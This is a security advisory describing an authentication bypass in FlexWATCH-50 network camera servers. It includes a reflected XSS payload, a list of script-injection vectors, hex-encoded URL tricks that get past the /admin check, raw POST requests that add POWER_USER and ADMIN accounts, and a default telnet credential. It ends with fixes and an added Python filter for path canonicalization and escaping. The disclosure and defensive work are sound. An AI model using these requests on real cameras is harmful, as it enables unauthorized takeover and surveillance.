#=============================================================
#  Unauthorized Access vulnerability in FlexWATCH camera Server 
#                      Second Assault !
#============================================================= 


Author: SLAIZER 
mail: slaizer[at]phreaker.net

Vendor : SEYEON Technology
System : FlexWATCH Network Video Server
url :  http://www.flexwatch.com/
Mail:  sytech@seyeon.co.kr

Product Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003

#====================
#  Introduction
#====================

A few months ago I published another document, explaining how to obtain full access
to the system in an easy and fast way.
The same document was sent to SEYEON before being published; since I did not get a
response from them, I decided to publish it. Two months after it was published,
SEYEON got in touch with me. They asked me to test a new system already patched for
the bug, so that I could tell them whether I had found bugs.
They demanded that I remove the name of the company from my previous document
and that I should not publish any more...
On top of that, doing work for a company with many economic benefits, completely
for free, is a thing that I do not accept. I will always be ready to help whoever needs
it for free, as long as nothing is demanded of me, and much less when I don't use proprietary
software. I'm sorry if it seems exaggerated, but nobody lives on air.


#===================
#  Description 
#===================
 
On to examining the new system!

slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80

HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs  <---------- :) the same everlasting banner
Date: Mon Dec  1 01:01:26 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 1
 

In the other version I did not examine the services in use, because I did not need it :P.

root@Necora:~$ nmap -sS -P0 victim 
Interesting ports on victim (censored :P):

PORT      STATE    SERVICE
21/tcp    open     ftp      <------- 
23/tcp    open     telnet   <-------  Default user/pass are root/root :P 
80/tcp    open     http     <-------  They are not very interesting right now either, 
1024/tcp  open     kdm      <-------  and SSL is such a nice thing to use :P.
1755/tcp  open     wms      <-------  



It's time to look at the web application:

Browsing through the web interface, we see that the system has changed a bit as far as the
 directory tree is concerned, but for the rest it seems to be the same.
 
The first thing we meet is a bug in the page whose job is to notify us that the URL we want
to access doesn't exist (404 error): a piece of XSS :P.

Cross-Site Scripting .

 Example :

   mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>

   Results :

    Access Error: Page not found 
    
    when trying to obtain /hehe.html
    
    cannot open URL /hehe.html

  ( The code is executed perfectly, even twice .. hehe . It turns out that two
    windows alert us with the message -Security ?- ).
  
 View source :

   <html>
       <head>
          <title>Document Error: Page not found</title>
       </head>
      <body>
      <h2>Access Error: Page not found</h2>
      when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>
      <br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>
      </body>
   </html>

Note: 

This type of technique is well known as a way to gain access to the system by means of malicious
links that play with the identification (session) of some user:
document.write / document.cookie / document.location..


I list different methods of JavaScript injection, taken from Globbes Security Advisory #33:

  <a href="javas&#99;ript&#35;[code]">
  <div onmouseover="[code]">
  <img src="javascript:[code]">
  <img dynsrc="javascript:[code]"> [IE]
  <input type="image" dynsrc="javascript:[code]"> [IE]
  <bgsound src="javascript:[code]"> [IE]
  &<script>[code]</script>
  &{[code]}; [N4]
  <img src=&{[code]};> [N4]
  <link rel="stylesheet" href="javascript:[code]">
  <iframe src="vbscript:[code]"> [IE]
  <img src="mocha:[code]"> [N4]
  <img src="livescript:[code]"> [N4]
  <a href="about:<s&#99;ript>[code]</script>">
  <meta http-equiv="refresh" content="0;url=javascript:[code]">
  <body onload="[code]">
  <div style="background-image: url(javascript:[code]);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression([code]);"> [IE]
  <style type="text/javascript">[code]</style> [N4]
  <object classid="clsid:..." codebase="javascript:[code]"> [IE]
  <style><!--</style><script>[code]//--></script>
  <![CDATA[<!--]]><script>[code]//--></script>
  <!-- -- --><script>[code]</script><!-- -- -->
  <script>[code]</script>
  <img src="blah"onmouseover="[code]">
  <img src="blah>" onmouseover="[code]">
  <xml src="javascript:[code]">
  <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
  <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

   
The information that the client sends to the server must always be verified; in this
 case the most obvious solution is to check that malicious characters are not inserted,
 for example by substituting them with their HTML equivalents (entities).




------------ u0xa ---------------



Where I want to get to at this moment is this URL: admin/aindex.htm .
 That is where the system administration is found, so by trying and using some
 imagination, I check what happens on sending the request in hexadecimal (URL-encoded) format.

Example :



slaizer@Necora:~$ ./urlhex.pl  http://victim/admin/aindex.htm

------------ Url encode to hex mode ----------------

 http://victim/%61%64m%69n/a%69nde%78.%68t%6D

-----------------By SLAIZER tools ------------------

I obtain this in plain text:


------ code -----
<html>
<head>
<script language="Javascript">
     onBlur=self.focus()
</script>
<frameset cols="196,*" framespacing="0" frameborder="0">
  <frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">
  <frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">
   </frameset>
</head>
</html>
----- code -----



:D It's my friend the configuration frameset, and it's in plain text ..
We are on the right track; let's see if we can do something with this.

 
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm 

------------ Url encode to hex mode ----------------

http://victim/adm%69%6E/%61%64%6D%69n.%68tm

-----------------By SLAIZER tools ------------------


This is where we are going to focus, so let's look at it!

Important links :
  _______________________
 |-Change Root           | <---- /asp/pwdcfg.asp
 |Password configuration | 
 |                       |
 |-Add User              | <---- /asp/adduser.asp /* Let's go! */
 |                       |
 |-Delete User           | <---- /asp/deluser.asp
 |                       |
 |-Access Level          | <---- /asp/chglimit.asp
 |_______________________| 



slaizer@Necora:~$ nc victim 80 

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p   <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache
 
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK


----------- u0xa ------------

<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------



It seems that the POST went through correctly, but on trying to log in it shows us this error directly:

   Access Error: Forbidden

   When trying to obtain /admin/aindex.htm
   Access Denied Prohibited User .

   -------------------------------


foh.... but ... I log in here:

	   http://victim/app/idxas.html   <----- Camera Administration. 

Login : slaizer
password: root123
 

|o_O| <- hehe !! We already have access to all cameras!!! using the login slaizer with pass root123 
	        that we added in the previous step. We have already made a great step forward.. 


But... the solution is simpler than it seems.. the added user belongs to POWER_USER; having
this user is really more than sufficient already, but it is enough for us to do one more test and
add another user to the ADMIN group:

Example

slaizer@Necora:~$ nc victim 80 

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p   <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 147
Pragma: no-cache
 
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root&passconf=123root&group=ADMIN&enabled=on&ok=OK




----------- u0xa ------------

<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------

So far ok! .


I use the login rezials & password 123root and..... :D Congratulations! You are ADMIN!!!

You can already do what you want in the system!!!
 
The problem was that the /admin directory was no longer denying access to the users as it
previously did, because the encoded path did not match the protected one.


#=========================
# Solution : 
#=========================


Always verify the kind of request that the client makes, since as you can see I have used a mixture of 
hex-encoded and ASCII characters .
The best solution is to create authentication sessions and to allow access to such directories only 
through the session.
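As an added illustration of both fixes described in this advisory (this is example code, not code from the advisory or from SEYEON), here is a minimal request filter: it canonicalizes the request path (percent-decoding and normalizing) before the /admin access check, ties that access to an authenticated admin session, and HTML-escapes the path echoed by the 404 page. The protected-prefix list, the session and admin names, and the page template are assumptions.

```python
from html import escape
from posixpath import normpath
from typing import Optional, Set
from urllib.parse import unquote

# Constructed policy: the admin tree from the advisory is the protected area.
PROTECTED_PREFIXES = ("/admin",)


def is_protected_vulnerable(raw_path: str) -> bool:
    # Compares the request path as received, so "/%61dmin/..." never matches.
    return any(raw_path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def canonical_path(raw_path: str) -> str:
    # Drop the query string, percent-decode until stable (defeats
    # double-encoding), then collapse "." and ".." segments, so the check
    # sees the same path the file server will actually open.
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return normpath("/" + path.lstrip("/"))


def is_protected(raw_path: str) -> bool:
    path = canonical_path(raw_path)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def authorize(raw_path: str, session_user: Optional[str], admins: Set[str]) -> bool:
    # Access to the admin tree depends on an authenticated admin session,
    # not on how the URL happens to be spelled.
    if not is_protected(raw_path):
        return True
    return session_user is not None and session_user in admins


def not_found_page(raw_path: str) -> str:
    # Echo the requested path only after HTML-escaping it, so a payload like
    # "<script>alert(1)</script>" is rendered as text instead of executed.
    shown = escape(unquote(raw_path), quote=True)
    return ("<html><body><h2>Access Error: Page not found</h2>"
            f"when trying to obtain <b>{shown}</b></body></html>")
```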

/* Note : log in at www.flexwatch.com as technical e-mail support... xD */


#========================
# GreetSssSss!!!
#========================

- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu - 
  
- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD
 [[Irc-Hispano : #boinasnegras , #ngsec]]